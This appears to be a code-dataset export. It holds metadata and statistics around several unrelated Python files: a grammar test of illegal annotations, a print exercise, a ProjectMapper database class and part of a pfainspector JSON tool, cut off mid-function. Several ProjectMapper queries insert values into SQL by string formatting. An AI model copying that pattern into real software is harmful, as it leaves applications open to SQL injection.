| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a27ede8c67c9624a2abddd0e9520dc0d9d8818bc
| 83
|
py
|
Python
|
Python/Tests/TestData/Grammar/VarAnnotationIllegal.py
|
techkey/PTVS
|
8355e67eedd8e915ca49bd38a2f36172696fd903
|
[
"Apache-2.0"
] | 695
|
2019-05-06T23:49:37.000Z
|
2022-03-30T01:56:00.000Z
|
Python/Tests/TestData/Grammar/VarAnnotationIllegal.py
|
techkey/PTVS
|
8355e67eedd8e915ca49bd38a2f36172696fd903
|
[
"Apache-2.0"
] | 1,672
|
2019-05-06T21:09:38.000Z
|
2022-03-31T23:16:04.000Z
|
Python/Tests/TestData/Grammar/VarAnnotationIllegal.py
|
techkey/PTVS
|
8355e67eedd8e915ca49bd38a2f36172696fd903
|
[
"Apache-2.0"
] | 186
|
2019-05-13T03:17:37.000Z
|
2022-03-31T16:24:05.000Z
|
fob, oar: baz
fob: oar, baz
fob, oar: baz = 1
fob: oar, baz = 1
fob: oar = baz = 1
| 13.833333
| 18
| 0.578313
| 18
| 83
| 2.666667
| 0.222222
| 0.625
| 0.9375
| 0.625
| 1
| 1
| 0.625
| 0.625
| 0
| 0
| 0
| 0.04918
| 0.26506
| 83
| 5
| 19
| 16.6
| 0.737705
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a28aefb5a0a2f7b18bd05f5a3c63864e001ccd02
| 206
|
py
|
Python
|
Nkechi Esomonu/Phase 1/Python Basic 1/Day 1/Day2/task 1.py
|
nkem1010/python-challenge-solutions
|
203cedc691094a83b110fc75764aac51dbbc1a03
|
[
"MIT"
] | null | null | null |
Nkechi Esomonu/Phase 1/Python Basic 1/Day 1/Day2/task 1.py
|
nkem1010/python-challenge-solutions
|
203cedc691094a83b110fc75764aac51dbbc1a03
|
[
"MIT"
] | null | null | null |
Nkechi Esomonu/Phase 1/Python Basic 1/Day 1/Day2/task 1.py
|
nkem1010/python-challenge-solutions
|
203cedc691094a83b110fc75764aac51dbbc1a03
|
[
"MIT"
] | null | null | null |
text="Twinkle, twinkle, little star,\n\tHow I wonder what you are!\n\t\tUp above the world so high,\n\t\tLike a diamond in the sky.\nTwinkle, twinkle, little star,\n\tHow I wonder what you are"
print(text)
| 103
| 193
| 0.742718
| 41
| 206
| 3.731707
| 0.609756
| 0.169935
| 0.222222
| 0.235294
| 0.509804
| 0.509804
| 0.509804
| 0.509804
| 0.509804
| 0.509804
| 0
| 0
| 0.135922
| 206
| 2
| 194
| 103
| 0.859551
| 0
| 0
| 0
| 0
| 0.5
| 0.898551
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
a2c47c43655e5763046f3ed729b82a6f10e74966
| 45
|
py
|
Python
|
services/validators/__init__.py
|
rfukui/orign
|
7d0c22d5f006727ec33fa57efec75c7e762decc5
|
[
"Unlicense"
] | null | null | null |
services/validators/__init__.py
|
rfukui/orign
|
7d0c22d5f006727ec33fa57efec75c7e762decc5
|
[
"Unlicense"
] | null | null | null |
services/validators/__init__.py
|
rfukui/orign
|
7d0c22d5f006727ec33fa57efec75c7e762decc5
|
[
"Unlicense"
] | 1
|
2020-11-09T15:21:51.000Z
|
2020-11-09T15:21:51.000Z
|
from .input_validator import input_validator
| 22.5
| 44
| 0.888889
| 6
| 45
| 6.333333
| 0.666667
| 0.736842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088889
| 45
| 1
| 45
| 45
| 0.926829
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a2d00de25998c8e4c3213d35dd273d9891b55336
| 19,304
|
py
|
Python
|
src/server/db/ProjectMapper.py
|
muenstermannmarius/ElectionSystem
|
a6e60d9147423787e869587b808def4771f89cb7
|
[
"RSA-MD"
] | null | null | null |
src/server/db/ProjectMapper.py
|
muenstermannmarius/ElectionSystem
|
a6e60d9147423787e869587b808def4771f89cb7
|
[
"RSA-MD"
] | null | null | null |
src/server/db/ProjectMapper.py
|
muenstermannmarius/ElectionSystem
|
a6e60d9147423787e869587b808def4771f89cb7
|
[
"RSA-MD"
] | null | null | null |
from server.bo.Project import Project
from server.db.Mapper import Mapper
class ProjectMapper(Mapper):
"""Mapper class that maps project objects to a relational database.
database. For this a set of methods is made available, with
methods, which can be used to search for, create, modify and delete objects.
can be deleted. The mapping is bidirectional. I.e., objects can be
be converted into DB structures and DB structures into objects.
"""
def __init__(self):
super().__init__()
def find_all(self):
"""Read out all projects.
:return A collection of projects objects that all projects represent."""
result = []
cursor = self._connection.cursor()
cursor.execute("SELECT * FROM Project")
tuples = cursor.fetchall()
for (id, creation_date, name, short_description, special_room, room_desired, num_blockdays_prior_lecture,
date_blockdays_during_lecture, num_blockdays_during_lecture, num_blockdays_in_exam,
weekly, num_spots, language, external_partner, edv_number, projecttype_id, module_id, professor_id,
add_professor_id, current_state_id) in tuples:
project = Project()
project.set_id(id)
project.set_date(creation_date)
project.set_name(name)
project.set_short_description(short_description)
project.set_special_room(special_room)
project.set_room_desired(room_desired)
project.set_num_blockdays_prior_lecture(num_blockdays_prior_lecture)
project.set_date_blockdays_during_lecture(date_blockdays_during_lecture)
project.set_num_blockdays_during_lecture(num_blockdays_during_lecture)
project.set_num_blockdays_in_exam(num_blockdays_in_exam)
project.set_weekly(weekly)
project.set_num_spots(num_spots)
project.set_language(language)
project.set_external_partner(external_partner)
project.set_edv_number(edv_number)
project.set_projecttype_id(projecttype_id)
project.set_module_id(module_id)
project.set_professor_id(professor_id)
project.set_add_professor_id(add_professor_id)
project.set_state(current_state_id)
result.append(project)
self._connection.commit()
cursor.close()
return result
def find_by_id(self, id):
"""Read out the project based on their id.
: param project_id of the associated project.
: return a project object with the id number."""
result = None
cursor = self._connection.cursor()
command = "SELECT * FROM Project WHERE id={}".format(id)
cursor.execute(command)
tuples = cursor.fetchall()
for (id, creation_date, name, short_description, special_room, room_desired, num_blockdays_prior_lecture,
date_blockdays_during_lecture, num_blockdays_during_lecture, num_blockdays_in_exam,
weekly, num_spots, language, external_partner, edv_number, projecttype_id, module_id, professor_id,
add_professor_id, current_state_id) in tuples:
project = Project()
project.set_id(id)
project.set_date(creation_date)
project.set_name(name)
project.set_short_description(short_description)
project.set_special_room(special_room)
project.set_room_desired(room_desired)
project.set_num_blockdays_prior_lecture(num_blockdays_prior_lecture)
project.set_date_blockdays_during_lecture(date_blockdays_during_lecture)
project.set_num_blockdays_during_lecture(num_blockdays_during_lecture)
project.set_num_blockdays_in_exam(num_blockdays_in_exam)
project.set_weekly(weekly)
project.set_num_spots(num_spots)
project.set_language(language)
project.set_external_partner(external_partner)
project.set_edv_number(edv_number)
project.set_projecttype_id(projecttype_id)
project.set_module_id(module_id)
project.set_professor_id(professor_id)
project.set_add_professor_id(add_professor_id)
project.set_state(current_state_id)
result = project
self._connection.commit()
cursor.close()
return result
def find_project_by_name(self, name):
"""Read out all projects based on their name.
:return A collection of projects objects that all represent all projects by name."""
result = []
cursor = self._connection.cursor()
cursor.execute("SELECT * FROM Project WHERE name LIKE '{}' ORDER BY name".format(name))
tuples = cursor.fetchall()
for (id, creation_date, name, short_description, special_room, room_desired, num_blockdays_prior_lecture,
date_blockdays_during_lecture, num_blockdays_during_lecture, num_blockdays_in_exam,
weekly, num_spots, language, external_partner, edv_number, projecttype_id, module_id, professor_id,
add_professor_id, current_state_id) in tuples:
project = Project()
project.set_id(id)
project.set_date(creation_date)
project.set_name(name)
project.set_short_description(short_description)
project.set_special_room(special_room)
project.set_room_desired(room_desired)
project.set_num_blockdays_prior_lecture(num_blockdays_prior_lecture)
project.set_date_blockdays_during_lecture(date_blockdays_during_lecture)
project.set_num_blockdays_during_lecture(num_blockdays_during_lecture)
project.set_num_blockdays_in_exam(num_blockdays_in_exam)
project.set_weekly(weekly)
project.set_num_spots(num_spots)
project.set_language(language)
project.set_external_partner(external_partner)
project.set_edv_number(edv_number)
project.set_projecttype_id(projecttype_id)
project.set_module_id(module_id)
project.set_professor_id(professor_id)
project.set_add_professor_id(add_professor_id)
project.set_state(current_state_id)
result.append(project)
self._connection.commit()
cursor.close()
return result
def insert(self, project):
"""Insertion of a project object into the database.
The primary key of the transferred object is also checked and if necessary
corrected.
: param project the object to be saved
: return the object that has already been transferred, but with a possibly corrected ID.
"""
cursor = self._connection.cursor()
cursor.execute("SELECT MAX(id) AS maxid FROM Project ")
tuples = cursor.fetchall()
for (maxid) in tuples:
if maxid[0] is not None:
"""
If we determine a central ID we use this
by 1 and assign this value as the ID to the project object. """
project.set_id(maxid[0] + 1)
else:
"""If we CAN'T find a maximum ID, let's
assume that the table is empty and that we can start with ID 1. """
project.set_id(1)
command = "INSERT INTO Project (id, creation_date, name, short_description, special_room, room_desired, num_blockdays_prior_lecture, \
date_blockdays_during_lecture, num_blockdays_during_lecture, num_blockdays_in_exam, weekly, num_spots, language, external_partner, edv_number, \
projecttype_id, module_id, professor_id, add_professor_id, current_state_id) \
VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)"
data = (project.get_id(),
project.get_date(),
project.get_name(),
project.get_short_description(),
project.get_special_room(),
project.get_room_desired(),
project.get_num_blockdays_prior_lecture(),
project.get_date_blockdays_during_lecture(),
project.get_num_blockdays_during_lecture(),
project.get_num_blockdays_in_exam(),
project.get_weekly(),
project.get_num_spots(),
project.get_language(),
project.get_external_partner(),
project.get_edv_number(),
project.get_projecttype_id(),
project.get_module_id(),
project.get_professor_id(),
project.get_add_professor_id(),
project.get_state())
cursor.execute(command, data)
self._connection.commit()
cursor.close()
return project
def delete(self, project):
"""Deleting the data of a project object from the database.
: param project the "object" to be deleted from the DB
"""
cursor = self._connection.cursor()
command = "DELETE FROM Project WHERE id={}".format(project.get_id())
cursor.execute(command)
self._connection.commit()
cursor.close()
return project
def update(self, project):
"""Repeated writing of an project object to the database.
: param project the object to be written into the DB
"""
cursor = self._connection.cursor()
command = "UPDATE Project " + "SET name=%s, short_description=%s, special_room=%s, room_desired=%s, num_blockdays_prior_lecture=%s, \
date_blockdays_during_lecture=%s, num_blockdays_during_lecture=%s, num_blockdays_in_exam=%s, weekly=%s, num_spots=%s, \
language=%s, external_partner=%s, edv_number=%s, projecttype_id=%s, module_id=%s, professor_id=%s, add_professor_id=%s, current_state_id=%s WHERE id=%s"
data = (project.get_name(),
project.get_short_description(),
project.get_special_room(),
project.get_room_desired(),
project.get_num_blockdays_prior_lecture(),
project.get_date_blockdays_during_lecture(),
project.get_num_blockdays_during_lecture(),
project.get_num_blockdays_in_exam(),
project.get_weekly(),
project.get_num_spots(),
project.get_language(),
project.get_external_partner(),
project.get_edv_number(),
project.get_projecttype_id(),
project.get_module_id(),
project.get_professor_id(),
project.get_add_professor_id(),
project.get_state(),
project.get_id())
cursor.execute(command, data)
self._connection.commit()
cursor.close()
def find_project_by_professor_id(self, professor_id):
result = []
cursor = self._connection.cursor()
command = "SELECT * FROM Project WHERE professor_id={}".format(professor_id)
cursor.execute(command)
tuples = cursor.fetchall()
for (id, creation_date, name, short_description, special_room, room_desired, num_blockdays_prior_lecture,
date_blockdays_during_lecture, num_blockdays_during_lecture, num_blockdays_in_exam,
weekly, num_spots, language, external_partner, edv_number, projecttype_id, module_id, professor_id,
add_professor_id, current_state_id) in tuples:
project = Project()
project.set_id(id)
project.set_date(creation_date)
project.set_name(name)
project.set_short_description(short_description)
project.set_special_room(special_room)
project.set_room_desired(room_desired)
project.set_num_blockdays_prior_lecture(num_blockdays_prior_lecture)
project.set_date_blockdays_during_lecture(date_blockdays_during_lecture)
project.set_num_blockdays_during_lecture(num_blockdays_during_lecture)
project.set_num_blockdays_in_exam(num_blockdays_in_exam)
project.set_weekly(weekly)
project.set_num_spots(num_spots)
project.set_language(language)
project.set_external_partner(external_partner)
project.set_edv_number(edv_number)
project.set_projecttype_id(projecttype_id)
project.set_module_id(module_id)
project.set_professor_id(professor_id)
project.set_add_professor_id(add_professor_id)
project.set_state(current_state_id)
result.append(project)
self._connection.commit()
cursor.close()
return result
def find_project_by_projecttype_id(self, projecttype_id):
result = []
cursor = self._connection.cursor()
command = "SELECT * FROM Project WHERE projecttype_id={}".format(projecttype_id)
cursor.execute(command)
tuples = cursor.fetchall()
for (id, creation_date, name, short_description, special_room, room_desired, num_blockdays_prior_lecture,
date_blockdays_during_lecture, num_blockdays_during_lecture, num_blockdays_in_exam,
weekly, num_spots, language, external_partner, edv_number, projecttype_id, module_id, professor_id,
add_professor_id, current_state_id) in tuples:
project = Project()
project.set_id(id)
project.set_date(creation_date)
project.set_name(name)
project.set_short_description(short_description)
project.set_special_room(special_room)
project.set_room_desired(room_desired)
project.set_num_blockdays_prior_lecture(num_blockdays_prior_lecture)
project.set_date_blockdays_during_lecture(date_blockdays_during_lecture)
project.set_num_blockdays_during_lecture(num_blockdays_during_lecture)
project.set_num_blockdays_in_exam(num_blockdays_in_exam)
project.set_weekly(weekly)
project.set_num_spots(num_spots)
project.set_language(language)
project.set_external_partner(external_partner)
project.set_edv_number(edv_number)
project.set_projecttype_id(projecttype_id)
project.set_module_id(module_id)
project.set_professor_id(professor_id)
project.set_add_professor_id(add_professor_id)
project.set_state(current_state_id)
result.append(project)
self._connection.commit()
cursor.close()
return result
def find_project_by_state(self, state):
"""Read out all projects based on their state.
:return A collection of projects objects that all represent all projects by state."""
result = []
cursor = self._connection.cursor()
cursor.execute("SELECT * FROM Project WHERE current_state_id={}".format(state))
tuples = cursor.fetchall()
for (id, creation_date, name, short_description, special_room, room_desired, num_blockdays_prior_lecture,
date_blockdays_during_lecture, num_blockdays_during_lecture, num_blockdays_in_exam,
weekly, num_spots, language, external_partner, edv_number, projecttype_id, module_id, professor_id,
add_professor_id, current_state_id) in tuples:
project = Project()
project.set_id(id)
project.set_date(creation_date)
project.set_name(name)
project.set_short_description(short_description)
project.set_special_room(special_room)
project.set_room_desired(room_desired)
project.set_num_blockdays_prior_lecture(num_blockdays_prior_lecture)
project.set_date_blockdays_during_lecture(date_blockdays_during_lecture)
project.set_num_blockdays_during_lecture(num_blockdays_during_lecture)
project.set_num_blockdays_in_exam(num_blockdays_in_exam)
project.set_weekly(weekly)
project.set_num_spots(num_spots)
project.set_language(language)
project.set_external_partner(external_partner)
project.set_edv_number(edv_number)
project.set_projecttype_id(projecttype_id)
project.set_module_id(module_id)
project.set_professor_id(professor_id)
project.set_add_professor_id(add_professor_id)
project.set_state(current_state_id)
result.append(project)
self._connection.commit()
cursor.close()
return result
def get_project_by_module(self, module_id):
"""Read out all projects based on their module.
:return A collection of projects objects that all represent all projects by module."""
result = []
cursor = self._connection.cursor()
command = "SELECT * FROM Project WHERE module_id={}".format(module_id)
cursor.execute(command)
tuples = cursor.fetchall()
for (id, creation_date, name, short_description, special_room, room_desired, num_blockdays_prior_lecture,
date_blockdays_during_lecture, num_blockdays_during_lecture, num_blockdays_in_exam,
weekly, num_spots, language, external_partner, edv_number, projecttype_id, module_id, professor_id,
add_professor_id, current_state_id) in tuples:
project = Project()
project.set_id(id)
project.set_date(creation_date)
project.set_name(name)
project.set_short_description(short_description)
project.set_special_room(special_room)
project.set_room_desired(room_desired)
project.set_num_blockdays_prior_lecture(num_blockdays_prior_lecture)
project.set_date_blockdays_during_lecture(date_blockdays_during_lecture)
project.set_num_blockdays_during_lecture(num_blockdays_during_lecture)
project.set_num_blockdays_in_exam(num_blockdays_in_exam)
project.set_weekly(weekly)
project.set_num_spots(num_spots)
project.set_language(language)
project.set_external_partner(external_partner)
project.set_edv_number(edv_number)
project.set_projecttype_id(projecttype_id)
project.set_module_id(module_id)
project.set_professor_id(professor_id)
project.set_add_professor_id(add_professor_id)
project.set_state(current_state_id)
result.append(project)
self._connection.commit()
cursor.close()
return result
| 45.314554
| 173
| 0.646964
| 2,220
| 19,304
| 5.236486
| 0.068919
| 0.123011
| 0.094624
| 0.051613
| 0.855656
| 0.852903
| 0.838796
| 0.820645
| 0.805505
| 0.791312
| 0
| 0.000433
| 0.281962
| 19,304
| 425
| 174
| 45.421176
| 0.838251
| 0.073663
| 0
| 0.858491
| 0
| 0.012579
| 0.021647
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034591
| false
| 0
| 0.006289
| 0
| 0.072327
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a2ec0beb259e571e9cf2096d1bb34873a321d4b6
| 24,363
|
py
|
Python
|
titus/titus/inspector/jsongadget.py
|
jmilleralpine/hadrian
|
6a438e0370487bbbac5e64a4d6d7a2728902d153
|
[
"Apache-2.0"
] | 127
|
2015-08-05T17:08:35.000Z
|
2019-10-17T07:07:08.000Z
|
titus/titus/inspector/jsongadget.py
|
jmilleralpine/hadrian
|
6a438e0370487bbbac5e64a4d6d7a2728902d153
|
[
"Apache-2.0"
] | 54
|
2015-11-20T02:21:29.000Z
|
2019-11-23T20:17:23.000Z
|
titus/titus/inspector/jsongadget.py
|
jmilleralpine/hadrian
|
6a438e0370487bbbac5e64a4d6d7a2728902d153
|
[
"Apache-2.0"
] | 58
|
2015-05-27T18:19:29.000Z
|
2019-05-23T12:37:17.000Z
|
#!/usr/bin/env python
# Copyright (C) 2014 Open Data ("Open Data" refers to
# one or more of the following companies: Open Data Partners LLC,
# Open Data Research LLC, or Open Data Capital LLC.)
#
# This file is part of Hadrian.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import json
import StringIO
import titus.producer.tools as t
from titus.inspector.defs import *
def depthGreaterThan(obj, target):
"""Helper function for determining if an object's depth is greater than a given target.
A string, number, boolean, or null has depth 0, a list or dict of such objects has depth 1, etc.
:type obj: Pythonized JSON
:param obj: object to inspect
:type target: non-negative integer
:param target: target depth
:rtype: bool
:return: ``True`` if the depth of ``obj`` is greater than ``target``; ``False`` otherwise.
"""
if isinstance(obj, dict):
return any(depthGreaterThan(x, target - 1) for x in obj.values()) or \
(len(obj) == 0 and target <= 0)
elif isinstance(obj, (list, tuple)):
return any(depthGreaterThan(x, target - 1) for x in obj) or \
(len(obj) == 0 and target <= 0)
else:
return target < 0
class LookCommand(Command):
"""The 'json look' command in pfainspector."""
def __init__(self, mode):
self.name = "look"
self.syntax = "look <name> [maxDepth=8] [indexWidth=30]"
self.help = "look at a named PFA document or subexpression in memory\n " + self.syntax
self.mode = mode
def complete(self, established, active):
"""Handle tab-complete for this command's arguments.
:type established: string
:param established: part of the text that has been established
:type active: string
:param active: part of the text to be completed
:rtype: list of strings
:return: potential completions
"""
options = ["maxDepth=", "indexWidth="]
words = getcomplete(established)
if len(words) == 0:
if active in self.mode.pfaFiles:
return [active + "["]
else:
return sorted(x for x in self.mode.pfaFiles if x.startswith(active))
elif len(words) == 1 and isinstance(words[0], parser.Extract) and words[0].partial:
if words[0].text in self.mode.pfaFiles:
return [x for x in extcomplete(self.mode.pfaFiles[words[0].text].obj, words[0].items) if x.startswith(active)]
else:
return []
elif not words[-1].partial:
return [x for x in options if x.startswith(active)]
else:
return []
def action(self, args):
"""Perform the action associated with this command.
:type args: list of titus.inspector.parser.Ast
:param args: arguments passed to the command
:rtype: ``None``
:return: nothing; results must be printed to the screen
"""
if len(args) == 1 and args[0] == parser.Word("help"):
print self.help
else:
options = {"maxDepth": 8, "indexWidth": 30}
while len(args) > 0 and isinstance(args[-1], parser.Option):
opt = args.pop()
if opt.word.text in ["maxDepth", "indexWidth"]:
try:
options[opt.word.text] = opt.value.value()
except TypeError:
raise InspectorError("illegal value for {0}".format(opt.word.text))
else:
raise InspectorError("option {0} unrecognized".format(opt.word.text))
if not isinstance(options["maxDepth"], (int, long)) or options["maxDepth"] <= 0:
raise InspectorError("maxDepth must be a positive integer")
if not isinstance(options["indexWidth"], (int, long)) or options["indexWidth"] <= 0:
raise InspectorError("indexWidth must be a positive integer")
if len(args) == 1 and isinstance(args[0], parser.Word):
if args[0].text not in self.mode.pfaFiles:
raise InspectorError("no PFA document named \"{0}\" in memory (try 'load <file> as {1}')".format(args[0].text, args[0].text))
node = self.mode.pfaFiles[args[0].text].obj
elif len(args) == 1 and isinstance(args[0], parser.Extract):
if args[0].text not in self.mode.pfaFiles:
raise InspectorError("no PFA document named \"{0}\" in memory (try 'load <file> as {1}')".format(args[0].text, args[0].text))
node = self.mode.pfaFiles[args[0].text].obj
items = args[0].items
node = extaction(args[0], node, items)
else:
self.syntaxError()
if not depthGreaterThan(node, 0):
print json.dumps(node)
else:
content = StringIO.StringIO()
if not depthGreaterThan(node, 1):
t.look(node, maxDepth=options["maxDepth"], indexWidth=options["indexWidth"], inlineDepth=0, stream=content)
elif not depthGreaterThan(node, 2):
t.look(node, maxDepth=options["maxDepth"], indexWidth=options["indexWidth"], inlineDepth=1, stream=content)
else:
t.look(node, maxDepth=options["maxDepth"], indexWidth=options["indexWidth"], inlineDepth=2, stream=content)
content = content.getvalue()
if content.count("\n") <= 100:
print content
else:
proc = pipe("less")
try:
proc.stdin.write(content)
except IOError as err:
if str(err) != "[Errno 32] Broken pipe":
raise
pipewait(proc)
class CountCommand(Command):
"""The 'json count' command in pfainspector."""
def __init__(self, mode):
self.name = "count"
self.syntax = "count <name> <pattern>"
self.help = "count instances in a PFA document or subexpression that match a regular expression\n " + self.syntax
self.mode = mode
def complete(self, established, active):
"""Handle tab-complete for this command's arguments.
:type established: string
:param established: part of the text that has been established
:type active: string
:param active: part of the text to be completed
:rtype: list of strings
:return: potential completions
"""
words = getcomplete(established)
if len(words) == 0:
if active in self.mode.pfaFiles:
return [active + "["]
else:
return sorted(x for x in self.mode.pfaFiles.keys() if x.startswith(active))
elif len(words) == 1 and isinstance(words[0], parser.Extract) and words[0].partial:
if words[0].text in self.mode.pfaFiles:
return [x for x in extcomplete(self.mode.pfaFiles[words[0].text].obj, words[0].items) if x.startswith(active)]
else:
return []
else:
return []
def action(self, args):
"""Perform the action associated with this command.
:type args: list of titus.inspector.parser.Ast
:param args: arguments passed to the command
:rtype: ``None``
:return: nothing; results must be printed to the screen
"""
if len(args) == 1 and args[0] == parser.Word("help"):
print self.help
else:
if len(args) == 2 and isinstance(args[0], parser.Word):
if args[0].text not in self.mode.pfaFiles:
raise InspectorError("no PFA document named \"{0}\" in memory (try 'load <file> as {1}')".format(args[0].text, args[0].text))
node = self.mode.pfaFiles[args[0].text].obj
elif len(args) == 2 and isinstance(args[0], parser.Extract):
if args[0].text not in self.mode.pfaFiles:
raise InspectorError("no PFA document named \"{0}\" in memory (try 'load <file> as {1}')".format(args[0].text, args[0].text))
node = self.mode.pfaFiles[args[0].text].obj
items = args[0].items
node = extaction(args[0], node, items)
else:
self.syntaxError()
regex = args[-1].regex()
print "{0} matches".format(t.count(regex, node))
class IndexCommand(Command):
"""The 'json index' command in pfainspector."""
def __init__(self, mode):
self.name = "index"
self.syntax = "index <name> <pattern>"
self.help = "list indexes of a PFA document or subexpression that match a regular expression\n " + self.syntax
self.mode = mode
def complete(self, established, active):
"""Handle tab-complete for this command's arguments.
:type established: string
:param established: part of the text that has been established
:type active: string
:param active: part of the text to be completed
:rtype: list of strings
:return: potential completions
"""
words = getcomplete(established)
if len(words) == 0:
if active in self.mode.pfaFiles:
return [active + "["]
else:
return sorted(x for x in self.mode.pfaFiles.keys() if x.startswith(active))
elif len(words) == 1 and isinstance(words[0], parser.Extract) and words[0].partial:
if words[0].text in self.mode.pfaFiles:
return [x for x in extcomplete(self.mode.pfaFiles[words[0].text].obj, words[0].items) if x.startswith(active)]
else:
return []
else:
return []
def action(self, args):
"""Perform the action associated with this command.
:type args: list of titus.inspector.parser.Ast
:param args: arguments passed to the command
:rtype: ``None``
:return: nothing; results must be printed to the screen
"""
if len(args) == 1 and args[0] == parser.Word("help"):
print self.help
else:
if len(args) == 2 and isinstance(args[0], parser.Word):
if args[0].text not in self.mode.pfaFiles:
raise InspectorError("no PFA document named \"{0}\" in memory (try 'load <file> as {1}')".format(args[0].text, args[0].text))
node = self.mode.pfaFiles[args[0].text].obj
elif len(args) == 2 and isinstance(args[0], parser.Extract):
if args[0].text not in self.mode.pfaFiles:
raise InspectorError("no PFA document named \"{0}\" in memory (try 'load <file> as {1}')".format(args[0].text, args[0].text))
node = self.mode.pfaFiles[args[0].text].obj
items = args[0].items
node = extaction(args[0], node, items)
else:
self.syntaxError()
regex = args[-1].regex()
def display(i):
if isinstance(i, basestring):
if " " in i:
return json.dumps(i)
else:
return i
else:
return str(i)
print "Indexes that match the pattern:"
count = 0
for index in t.indexes(regex, node):
print " [" + ", ".join(display(i) for i in index) + "]"
count += 1
if count == 0:
print " (none)"
class FindCommand(Command):
"""The 'json find' command in pfainspector."""
def __init__(self, mode):
self.name = "find"
self.syntax = "find <name> <pattern> [maxDepth=3] [indexWidth=30]"
self.help = "show all matches of a regular expression in a PFA document or subexpression\n " + self.syntax
self.mode = mode
def complete(self, established, active):
"""Handle tab-complete for this command's arguments.
:type established: string
:param established: part of the text that has been established
:type active: string
:param active: part of the text to be completed
:rtype: list of strings
:return: potential completions
"""
options = ["maxDepth=", "indexWidth="]
words = getcomplete(established)
if len(words) == 0:
if active in self.mode.pfaFiles:
return [active + "["]
else:
return sorted(x for x in self.mode.pfaFiles if x.startswith(active))
elif len(words) == 1 and isinstance(words[0], parser.Extract) and words[0].partial:
if words[0].text in self.mode.pfaFiles:
return [x for x in extcomplete(self.mode.pfaFiles[words[0].text].obj, words[0].items) if x.startswith(active)]
else:
return []
elif not words[-1].partial:
return [x for x in options if x.startswith(active)]
else:
return []
def action(self, args):
"""Perform the action associated with this command.
:type args: list of titus.inspector.parser.Ast
:param args: arguments passed to the command
:rtype: ``None``
:return: nothing; results must be printed to the screen
"""
if len(args) == 1 and args[0] == parser.Word("help"):
print self.help
else:
options = {"maxDepth": 3, "indexWidth": 30}
while len(args) > 0 and isinstance(args[-1], parser.Option):
opt = args.pop()
if opt.word.text in ["maxDepth", "indexWidth"]:
try:
options[opt.word.text] = opt.value.value()
except TypeError:
raise InspectorError("illegal value for {0}".format(opt.word.text))
else:
raise InspectorError("option {1} unrecognized".format(opt.word.text))
if not isinstance(options["maxDepth"], (int, long)) or options["maxDepth"] <= 0:
raise InspectorError("maxDepth must be a positive integer")
if not isinstance(options["indexWidth"], (int, long)) or options["indexWidth"] <= 0:
raise InspectorError("indexWidth must be a positive integer")
if len(args) == 2 and isinstance(args[0], parser.Word):
if args[0].text not in self.mode.pfaFiles:
raise InspectorError("no PFA document named \"{0}\" in memory (try 'load <file> as {1}')".format(args[0].text, args[0].text))
node = self.mode.pfaFiles[args[0].text].obj
elif len(args) == 2 and isinstance(args[0], parser.Extract):
if args[0].text not in self.mode.pfaFiles:
raise InspectorError("no PFA document named \"{0}\" in memory (try 'load <file> as {1}')".format(args[0].text, args[0].text))
node = self.mode.pfaFiles[args[0].text].obj
items = args[0].items
node = extaction(args[0], node, items)
else:
self.syntaxError()
regex = args[-1].regex()
def display(i):
if isinstance(i, basestring):
if " " in i:
return json.dumps(i)
else:
return i
else:
return str(i)
content = StringIO.StringIO()
count = 0
for index in t.indexes(regex, node):
content.write("At index [" + ", ".join(display(i) for i in index) + "]:\n")
matched = t.get(node, index)
if not depthGreaterThan(matched, 0):
content.write(json.dumps(matched) + "\n")
elif not depthGreaterThan(matched, 1):
t.look(matched, maxDepth=options["maxDepth"], indexWidth=options["indexWidth"], inlineDepth=0, stream=content)
elif not depthGreaterThan(matched, 2):
t.look(matched, maxDepth=options["maxDepth"], indexWidth=options["indexWidth"], inlineDepth=1, stream=content)
else:
t.look(matched, maxDepth=options["maxDepth"], indexWidth=options["indexWidth"], inlineDepth=2, stream=content)
content.write("\n")
count += 1
if count == 0:
print " (none)"
content = content.getvalue()
if content.count("\n") <= 100:
print content
else:
proc = pipe("less")
try:
